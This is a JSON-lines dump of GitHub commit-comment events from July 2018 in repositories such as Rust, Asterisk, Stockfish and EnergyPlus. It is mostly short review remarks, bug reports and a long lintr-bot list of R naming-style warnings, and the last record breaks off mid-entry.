{"id":"7989842122","type":"CommitCommentEvent","actor":{"login":"rabadin"},"repo":{"name":"olivergondza/openstack-cloud-plugin"},"payload":{"comment":{"id":29766249,"position":16,"line":70,"path":"src/test/java/jenkins/plugins/openstack/compute/JCloudsComputerTest.java","commit_id":"44d0745031a32e1c4b3bddaee70052c6aa7b057a","created_at":"2018-07-19T15:14:26Z","updated_at":"2018-07-19T15:14:26Z","author_association":"NONE","body":"Same reasoning here, the goal is to *start* the job then do the assertion, not wait for the job to complete."}},"created_at":"2018-07-19T15:14:26Z"}
{"id":"7989849959","type":"CommitCommentEvent","actor":{"login":"oli-obk"},"repo":{"name":"rust-lang/rust"},"payload":{"comment":{"id":29766269,"position":19,"line":1625,"path":"src/librustc_lint/builtin.rs","commit_id":"cde241eafb4a261ee680fc7a841dc46f9a5d0021","created_at":"2018-07-19T15:15:37Z","updated_at":"2018-07-19T15:15:37Z","author_association":"CONTRIBUTOR","body":"`None` happens when we should not be reporting an error, e.g. because typeck failed (and already reported a way nicer error than we ever could)"}},"created_at":"2018-07-19T15:15:37Z"}
{"id":"7989854065","type":"CommitCommentEvent","actor":{"login":"traud"},"repo":{"name":"asterisk/asterisk"},"payload":{"comment":{"id":29766282,"position":null,"line":null,"path":null,"commit_id":"64942276d15cf9edd20c69f10ecebbb65f7282f4","created_at":"2018-07-19T15:16:13Z","updated_at":"2018-07-19T15:16:13Z","author_association":"CONTRIBUTOR","body":"Please, create a full-blown report on [issues.asterisk.org](http://issues.asterisk.org/). There, please answer:\r\n1. You want (or need?) `insecure=port` for SIP over TCP as it was before, correct?\r\n2. Does your SIP trunk call you on another TCP port than the SIP-Register was sent to?\r\n\r\nWhen/if you created that issue report, please, link it here."}},"created_at":"2018-07-19T15:16:13Z"}
{"id":"7989856002","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29766287,"position":null,"line":null,"path":null,"commit_id":"0a03becc60423c02a7e155807379fa0109778b95","created_at":"2018-07-19T15:16:32Z","updated_at":"2018-07-19T15:16:32Z","author_association":"NONE","body":"@protonspring \r\nThats the course of life! Several of my commited patches have been removed since then."}},"created_at":"2018-07-19T15:16:32Z"}
{"id":"7989862622","type":"CommitCommentEvent","actor":{"login":"nemesislxxi"},"repo":{"name":"nemesislxxi/example-train"},"payload":{"comment":{"id":29766313,"position":null,"line":null,"path":null,"commit_id":"d7906ff0354ef89265f437c4bd9ffa21a0fb6b41","created_at":"2018-07-19T15:17:30Z","updated_at":"2018-07-19T15:17:30Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-19T15:17:30Z"}
{"id":"7989863132","type":"CommitCommentEvent","actor":{"login":"jarlopez"},"repo":{"name":"jarlopez/kompics-rust"},"payload":{"comment":{"id":29766314,"position":31,"line":177,"path":"core/src/dispatch/lookup.rs","commit_id":"b013e32893f673fb8b8fde4eee1cda0ef0513064","created_at":"2018-07-19T15:17:35Z","updated_at":"2018-07-19T15:17:35Z","author_association":"OWNER","body":"The `SequenceTrie` does not _quite_ support the same deletion semantics as the standard `HashMap`."}},"created_at":"2018-07-19T15:17:35Z"}
{"id":"7989864396","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29766315,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T15:17:46Z","updated_at":"2018-07-19T15:17:46Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T15:17:46Z"}
{"id":"7989865636","type":"CommitCommentEvent","actor":{"login":"disufi"},"repo":{"name":"upfrontIO/magazine-example"},"payload":{"comment":{"id":29766323,"position":null,"line":null,"path":null,"commit_id":"7448bf7f8b1f54431d96956c3da14cb52aa18b36","created_at":"2018-07-19T15:17:59Z","updated_at":"2018-07-19T15:17:59Z","author_association":"CONTRIBUTOR","body":"@rawdiggie Thanks, this looks good to me thanks for letting me know. I guess we have to do the same with our seed data :)\r\n\r\nWhat was the issue that needed this change to get resolved?"}},"created_at":"2018-07-19T15:17:59Z"}
{"id":"7989865768","type":"CommitCommentEvent","actor":{"login":"rynowak"},"repo":{"name":"aspnet/Blazor"},"payload":{"comment":{"id":29766325,"position":20,"line":19,"path":"src/Microsoft.JSInterop/JSAsyncCallResult.cs","commit_id":"233c3929cf7c036c8ddf350f908b448ec58427d4","created_at":"2018-07-19T15:18:00Z","updated_at":"2018-07-19T15:18:00Z","author_association":"MEMBER","body":"OK thanks this helps."}},"created_at":"2018-07-19T15:18:00Z"}
{"id":"7989867795","type":"CommitCommentEvent","actor":{"login":"Leo5878"},"repo":{"name":"Leo5878/omw"},"payload":{"comment":{"id":29766330,"position":null,"line":null,"path":null,"commit_id":"b888b105df620ae822f9d6f5713dc106a1d026f1","created_at":"2018-07-19T15:18:19Z","updated_at":"2018-07-19T15:18:19Z","author_association":"OWNER","body":"fix bug"}},"created_at":"2018-07-19T15:18:19Z"}
{"id":"7989869894","type":"CommitCommentEvent","actor":{"login":"lnatal"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29766336,"position":null,"line":null,"path":null,"commit_id":"12ca9e8b521127c5455b8e45b463371cc0cc6d3d","created_at":"2018-07-19T15:18:39Z","updated_at":"2018-07-19T15:18:39Z","author_association":"NONE","body":"I have 2 boards, one running bluetooth scanner and a second running  a wiffi web server, transmiting the mac by serial port2. The problem occours if wifi lose connection and when rerconnect the serial port stop working fine. I was modified my code to fix it, but it is not a good solution only temporary. "}},"created_at":"2018-07-19T15:18:39Z"}
{"id":"7989870953","type":"CommitCommentEvent","actor":{"login":"xalalau"},"repo":{"name":"JoelTroch/HLEnhanced"},"payload":{"comment":{"id":29766339,"position":null,"line":null,"path":null,"commit_id":"d8f80f1e2833b8ea0086baba4e09872ce52e7b09","created_at":"2018-07-19T15:18:50Z","updated_at":"2018-07-19T15:18:50Z","author_association":"NONE","body":"Kudos for Rafael Alves, he discovered the Mac problems! Our last building \"error\" is that the Linux libs are huge, like 212MB for hl.so and 91MB for the client.so.\r\n\r\nI'm glad Hu3-Life project finally did something for HLEnhanced! And excuse me, but these changes will be imported to my rep."}},"created_at":"2018-07-19T15:18:50Z"}
{"id":"7989876935","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29766357,"position":null,"line":null,"path":null,"commit_id":"0a03becc60423c02a7e155807379fa0109778b95","created_at":"2018-07-19T15:19:47Z","updated_at":"2018-07-19T15:19:47Z","author_association":"OWNER","body":":P"}},"created_at":"2018-07-19T15:19:47Z"}
{"id":"7989879008","type":"CommitCommentEvent","actor":{"login":"iamhssingh"},"repo":{"name":"civilmachines/drf-account"},"payload":{"comment":{"id":29766358,"position":null,"line":null,"path":null,"commit_id":"2bcf5ff0304fc243f4ebfc832213234888f767c1","created_at":"2018-07-19T15:20:06Z","updated_at":"2018-07-19T15:20:06Z","author_association":"MEMBER","body":"Closed #2 "}},"created_at":"2018-07-19T15:20:06Z"}
{"id":"7989890701","type":"CommitCommentEvent","actor":{"login":"alvieira"},"repo":{"name":"alvieira/website"},"payload":{"comment":{"id":29766388,"position":2,"line":5,"path":"README.md","commit_id":"039bcdd0e57ad618c0210aeed8b480fb75971167","created_at":"2018-07-19T15:21:52Z","updated_at":"2018-07-19T15:21:52Z","author_association":"OWNER","body":"What is this for?"}},"created_at":"2018-07-19T15:21:52Z"}
{"id":"7989892207","type":"CommitCommentEvent","actor":{"login":"alvieira"},"repo":{"name":"alvieira/website"},"payload":{"comment":{"id":29766390,"position":null,"line":null,"path":null,"commit_id":"039bcdd0e57ad618c0210aeed8b480fb75971167","created_at":"2018-07-19T15:22:05Z","updated_at":"2018-07-19T15:22:05Z","author_association":"OWNER","body":"New comment"}},"created_at":"2018-07-19T15:22:05Z"}
{"id":"7989895541","type":"CommitCommentEvent","actor":{"login":"alvieira"},"repo":{"name":"alvieira/website"},"payload":{"comment":{"id":29766400,"position":null,"line":null,"path":null,"commit_id":"039bcdd0e57ad618c0210aeed8b480fb75971167","created_at":"2018-07-19T15:22:36Z","updated_at":"2018-07-19T15:22:36Z","author_association":"OWNER","body":"Saving comment."}},"created_at":"2018-07-19T15:22:36Z"}
{"id":"7989937702","type":"CommitCommentEvent","actor":{"login":"1Tom-Robinson1"},"repo":{"name":"Gsuper36/DungeonGame"},"payload":{"comment":{"id":29766494,"position":null,"line":null,"path":null,"commit_id":"8c31c4f0847037dacb1ddaadc77d778b7192007a","created_at":"2018-07-19T15:29:22Z","updated_at":"2018-07-19T15:29:22Z","author_association":"COLLABORATOR","body":"Фууух,  можно жить\r\n"}},"created_at":"2018-07-19T15:29:22Z"}
{"id":"7989941378","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29766503,"position":1,"line":null,"path":"1532014194.58/github_test.txt","commit_id":"ba002ced5279120d4f37950678e6aa1ffe378399","created_at":"2018-07-19T15:29:57Z","updated_at":"2018-07-19T15:29:57Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-19T15:29:57Z"}
{"id":"7989942047","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29766506,"position":null,"line":null,"path":null,"commit_id":"997d60fe176a8f96ff6c68483f8d105886a14496","created_at":"2018-07-19T15:30:03Z","updated_at":"2018-07-19T15:30:03Z","author_association":"NONE","body":"[R/as_char_no_warn.R:27:12:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/as_char_no_warn.R#L27) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(fastIntToStringRcpp(x))\n           ^~~~~~~~~~~~~~~~~~~\n```\n[R/categorize.R:63:39:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/categorize.R#L63) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMul,\n                                      ^~~~~~~~~~~~~~\n```\n[R/categorize.R:169:39:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/categorize.R#L169) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMulSimple,\n                                      ^~~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:215:42:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/comorbid.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​                          comorbid_fun = comorbidMatMulSimple,\n                                         ^~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:132:1:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/guess.R#L132) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​guess_version.data.frame <- function(x, short_code = NULL, icd_name = NULL, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:191:10:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/guess.R#L191) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  ver <- guess_version.data.frame(x, icd_name = icd_name)\n         ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/parse.R:268:10:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/parse.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"740\", \"759\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:270:10:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/parse.R#L270) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"280\", \"289\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:304:1:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/parse.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​fixSubchapterNa <- function(x, start, end) {\n^~~~~~~~~~~~~~~\n```\n[R/score.R:74:1:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/score.R#L74) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​charlson.data.frame <- function(x, visit_name = NULL,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/score.R:308:1:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/score.R#L308) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​van_walraven.data.frame <- function(x, visit_name = NULL, return_df = FALSE,\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/util.R:189:1:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/R/util.R#L189) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​get_visit_name.data.frame <- function(x, visit_name = NULL) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:606:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L606) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:616:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L616) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 1, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:617:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L617) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:620:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L620) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 2, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:621:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L621) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 5, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:624:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L624) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:625:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L625) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:628:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L628) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:629:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L629) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:632:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L632) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:633:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L633) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:636:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L636) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:637:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L637) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:652:5:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-comorbid-maps-icd9.R#L652) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:284:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L284) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:285:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L285) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:286:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L286) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:287:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L287) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:288:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L288) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:289:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L289) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:295:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L295) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:296:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L296) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:297:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L297) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:298:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L298) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:299:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L299) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:300:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L300) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:309:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:310:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L310) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:311:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L311) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:312:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L312) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:313:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L313) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:314:18:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L314) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:321:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L321) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:322:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L322) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:323:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L323) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:324:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L324) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)), \"10023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:329:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:331:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:333:16:](https://github.com/jackwasey/icd/blob/997d60fe176a8f96ff6c68483f8d105886a14496/tests/tests-deprecated/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               